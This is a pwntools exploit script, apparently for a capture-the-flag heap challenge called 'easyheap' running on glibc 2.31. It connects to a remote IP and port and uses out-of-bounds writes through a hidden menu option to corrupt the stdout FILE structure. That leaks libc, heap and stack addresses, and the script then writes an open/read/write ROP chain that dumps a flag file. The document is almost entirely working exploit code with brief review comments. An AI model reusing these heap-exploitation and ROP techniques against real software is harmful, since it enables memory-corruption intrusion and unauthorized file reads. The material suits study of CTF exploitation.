| from pwn import * import ctypes import time
context(arch="amd64")
context.log_level = 'debug'


def getIO():
    """Spawn the challenge binary locally under the bundled loader and libc.

    Defined for local runs only; nothing below calls it, the script talks to
    the remote endpoint bound to `io` instead.
    """
    return process(['./ld-2.31.so', './easyheap'], env={'LD_PRELOAD': './libc-2.31.so'})


# Module-level session every helper below reads; rebound later on reconnect.
io = remote('112.74.185.213', 46699)
def add(size, cont):
    """Menu option 1: send `size` as a line, then `cont` raw after the Context prompt."""
    line_steps = (('4.delete\n', '1'), ('Size?\n', str(size)))
    for prompt, payload in line_steps:
        io.sendlineafter(prompt, payload)
    io.sendafter('Context:\n', cont)
def add2(size, offset, cont):
    """Menu option 1 sent as a 16-byte blob instead of a plain '1' line.

    The blob is '1\\x00' null-padded to 12 bytes followed by `offset` as an
    unsigned 32-bit little-endian value (negative offsets wrap). Prompts are
    matched with their trailing newline and `cont` is sent as a line.
    """
    choice = '1\x00'.ljust(12, '\x00')
    choice += p32(ctypes.c_uint32(offset).value)
    io.sendafter('4.delete\n', choice)
    io.sendlineafter('Size?\n', str(size))
    io.sendlineafter('Context:\n', cont)
def add3(size, offset, cont):
    """Variant of add2(): prompts matched without the trailing newline, `cont` sent raw.

    Same 16-byte choice blob ('1\\x00' padded to 12 bytes + unsigned 32-bit
    `offset`), but the Context payload goes out with sendafter, so no newline
    is appended to `cont`.
    """
    choice = '1\x00'.ljust(12, '\x00')
    choice += p32(ctypes.c_uint32(offset).value)
    io.sendafter('4.delete', choice)
    io.sendlineafter('Size?', str(size))
    io.sendafter('Context:', cont)
def edit(idx, cont):
    """Menu option 2: select slot `idx` and send `cont` as a newline-terminated line."""
    steps = (
        ('4.delete\n', '2'),
        ('Idx?\n', str(idx)),
        ('Context:\n', cont),
    )
    for prompt, payload in steps:
        io.sendlineafter(prompt, payload)
def edit2(idx, cont):
    """Variant of edit(): prompts matched without newline, `cont` sent raw (no newline)."""
    line_steps = (('4.delete', '2'), ('Idx?', str(idx)))
    for prompt, payload in line_steps:
        io.sendlineafter(prompt, payload)
    io.sendafter('Context:', cont)
def backdoor(size, offset, cont):
    """Menu option 666: send `size` and `offset` as lines, then `cont` raw."""
    line_steps = (
        ('4.delete\n', '666'),
        ('Size?\n', str(size)),
        ('Offset?\n', str(offset)),
    )
    for prompt, payload in line_steps:
        io.sendlineafter(prompt, payload)
    io.sendafter('Context:\n', cont)
def backdoor2(size, offset, cont):
    """Variant of backdoor(): prompts matched without the trailing newline."""
    line_steps = (
        ('4.delete', '666'),
        ('Size?', str(size)),
        ('Offset?', str(offset)),
    )
    for prompt, payload in line_steps:
        io.sendlineafter(prompt, payload)
    io.sendafter('Context:', cont)
# Main session. Every helper above talks to the module-level `io`, which the
# retry loop below rebinds after each failed attempt.
while 1:
    # One attempt per iteration; the loop only exits via `break` once an
    # 8-byte value has been read back. Any exception closes the session and
    # reconnects.
    fake_size = 0x061 + 0x1000*1  # 0x1061, written through option 666 at offset 0x6b8
    backdoor(0x18, 0x6b8, p64(fake_size))
    add(0x2000, 'ccccc')
    add(0x20, 'c')
    add(0x20, 'ccc')
    add(0x20, 'ccc')
    add(0x20, 'ccc')
    add(0x20, 'ccc')
    add(0x20, 'ccc')
    add2(0x10, -10, 'ccc')  # the negative offset is wrapped to 32 bits inside add2()
    backdoor(0x18, -3080, '\xb0')
    backdoor(0x18, -3616+6, p32(0x7))
    # NOTE(review): stdout_in is never read; the next call sends the same value
    # as its two little-endian bytes ('\xa0\x16' == 0x16a0).
    stdout_in = 0x16a0
    backdoor(0x18, 800, '\xa0\x16')
    flag = 0xfbad1800
    add2(0x48, 1, 'aa')
    try:
        add2(0x48, 0, p64(flag)+p64(0)*3 + '\x08')
        # Expect exactly 8 raw bytes within 0.2 s; getting the menu text
        # ('1.add') instead means this attempt produced nothing usable.
        inp = io.recv(8,timeout=0.2)
        if '1.add' in inp:
            # NOTE(review): assert is used as control flow to reach the except
            # branch. Under `python -O` it is stripped and the menu text would
            # be fed to u64() instead; a plain `raise` would not have that gap.
            assert 1 == 2
        stdin_addr = u64(inp)
        log.success('stdin_addr:'+hex(stdin_addr))
        break
    except:
        # NOTE(review): a bare except also catches KeyboardInterrupt and
        # SystemExit, so Ctrl-C just triggers another reconnect;
        # `except Exception:` would let the loop be interrupted.
        io.close()
        io = remote('112.74.185.213',46699)
# Every constant below is an offset into the libc build named on the process()
# line above (libc-2.31.so) and is only valid for that exact build.
# NOTE(review): the remote service is assumed to run the same build — confirm.
libc_base = stdin_addr - 0x1ee7f0
log.success('libc_base:'+hex(libc_base))
main_arena_96 = 0x1ecbe0 + libc_base
edit2(0, p64(flag)+p64(0)*3 + p64(main_arena_96))
# The next 8 bytes are decoded as a 64-bit value; 0x23010 is the author's
# measured adjustment from that value to heap_base.
heap_base = u64(io.recv(8)) -0x23010
log.success('heap_base:'+hex(heap_base))
environ = 0x1ef600 + libc_base
edit2(0, p64(flag)+p64(0)*3 + p64(environ) + p64(environ+0x10) + p64(environ+0x10))
log.success('environ:'+hex(environ))
# Second 8-byte read-back, again decoded as a 64-bit value.
stack_environ = u64(io.recv(8))
log.success('stack_environ:'+hex(stack_environ))
# Gadget addresses (libc-relative). NOTE(review): pop_rdi is assigned twice
# with the same value; push_rdi is never used, and add_rax only appears in
# the quoted-out alternative chain below.
rax_0 = 0x00000000000b1d89 + libc_base
rax_1 = 0x00000000000cfb50 + libc_base
rax_2 = 0x00000000000cfb60 + libc_base
pop_rdi = 0x0000000000023b72 + libc_base
pop_rsi = 0x000000000002604f + libc_base
xchg_eax_edi = 0x00000000000f1b95 + libc_base
syscall = 0x00000630D9 + libc_base
add_rax = 0x00000000000ac79c + libc_base
push_rdi = 0x00000000000e312b + libc_base
pop_rdi = 0x0000000000023b72+libc_base
vuln_stack_tar = stack_environ - 0x138 + 0x18
backdoor2(0x18, -512, p64(vuln_stack_tar))
add3(0xf0-8, 1, 'cccccc')
# 15 qwords; the two 0xadd entries are placeholders patched below.
rop_tmp = [
    pop_rdi, 0xadd,
    pop_rsi, 0,
    rax_2, syscall,
    xchg_eax_edi,
    pop_rsi, 0xadd,
    rax_0, syscall,
    pop_rdi, 1,
    rax_1, syscall
]
# Quoted-out alternative chain. This is a bare string expression, not a
# comment: it is evaluated and discarded at runtime.
'''
rop_tmp = [
    pop_rdi, 0xadd,
    pop_rsi, 0,
    rax_2, syscall, # open
    xchg_eax_edi, # eax -> edi fd
    rax_0,
    pop_rsi, 78,
    add_rax,
    pop_rsi, 0xadd,
    syscall, # getdents
    pop_rdi, 1,
    rax_1, syscall # write
]
'''
# Slots 1 and 8 (the placeholders) both receive the address just past the
# 15-entry list, which is where the NUL-terminated path appended on the next
# line lands — presumably because the flattened chain is written starting at
# vuln_stack_tar; confirm against the binary.
rop_tmp[1] = rop_tmp[8] = vuln_stack_tar + len(rop_tmp) * 8
rop_tmp = flat(rop_tmp) + '/Flag/R3a1_f1Ag_1s_here\x00'
# Quoted-out debugger hook; also a string expression, evaluated and discarded.
'''
gdb.attach(io)
pause()
'''
add3(0xf0-8, 1, rop_tmp)
io.interactive()